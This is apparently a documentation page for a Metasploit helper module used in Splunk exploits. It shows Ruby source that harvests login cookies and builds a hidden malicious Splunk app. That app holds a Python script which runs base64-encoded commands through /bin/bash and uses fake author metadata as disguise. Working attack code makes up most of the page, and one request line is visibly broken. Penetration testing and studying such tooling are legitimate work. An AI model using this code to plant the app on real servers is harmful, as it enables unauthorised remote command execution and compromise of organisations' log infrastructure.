Module: Msf::Exploit::Remote::HTTP::Splunk::Helpers

Included in:
Msf::Exploit::Remote::HTTP::Splunk
Defined in:
lib/msf/core/exploit/remote/http/splunk/helpers.rb

Overview

Module with helper methods for other Splunk module methods

Instance Method Summary collapse

Instance Method Details

#splunk_helper_extract_token(timeout = 20) ⇒ String?

Helper method to get tokens for login

Parameters:

  • timeout (Integer) (defaults to: 20)

    The maximum number of seconds to wait before the request times out

Returns:

  • (String, nil)

    Post data to use for login



9
10
11
12
13
14
15
16
17
18
19
20
21
 
# File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 9

def splunk_helper_extract_token(timeout = 20)
  res = send_request_cgi({
    'uri' => ,
    'method' => 'GET',
    'keep_cookies' => true
  }, timeout)

  unless res&.code == 200
    vprint_error('Unable to get login tokens')
    return nil
  end
  "session_id_#{datastore['RPORT']}=#{Rex::Text.rand_text_numeric(40)}; " << res.get_cookies
end

#splunk_helper_malicious_app(app_name) ⇒ Rex::Text

Helper method to construct malicious app in .tar.gz form

Parameters:

  • app_name (String)

    Name of app to upload

Returns:

  • (Rex::Text)

    Malicious app in .tar.gz form



27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
 
# File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 27

def splunk_helper_malicious_app(app_name)
  # metadata folder
  metadata = <<~EOF
    [commands]
    export = system
  EOF

  # default folder
  commands_conf = <<~EOF
    [#{app_name}]
    type = python
    filename = #{app_name}.py
    local = false
    enableheader = false
    streaming = false
    perf_warn_limit = 0
  EOF

  app_conf = <<~EOF
    [launcher]
    author=#{Faker::Name.name}
    description=#{Faker::Lorem.sentence}
    version=#{Faker::App.version}

    [ui]
    is_visible = false
  EOF

  # bin folder
  msf_exec_py = <<~EOF
    import sys, base64, subprocess
    import splunk.Intersplunk

    header = ['result']
    results = []

    try:
      proc = subprocess.Popen(['/bin/bash', '-c', base64.b64decode(sys.argv[1]).decode()], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
      output = proc.stdout.read()
      results.append({'result': base64.b64encode(output).decode('utf-8')})
    except Exception as e:
      error_msg = 'Error : ' + str(e)
      results = splunk.Intersplunk.generateErrorResults(error_msg)

    splunk.Intersplunk.outputResults(results, fields=header)
  EOF

  tarfile = StringIO.new
  Rex::Tar::Writer.new tarfile do |tar|
    tar.add_file("#{app_name}/metadata/default.meta", 0o644) do |io|
      io.write metadata
    end
    tar.add_file("#{app_name}/default/commands.conf", 0o644) do |io|
      io.write commands_conf
    end
    tar.add_file("#{app_name}/default/app.conf", 0o644) do |io|
      io.write app_conf
    end
    tar.add_file("#{app_name}/bin/#{app_name}.py", 0o644) do |io|
      io.write msf_exec_py
    end
  end
  tarfile.rewind
  tarfile.close

  Rex::Text.gzip(tarfile.string)
end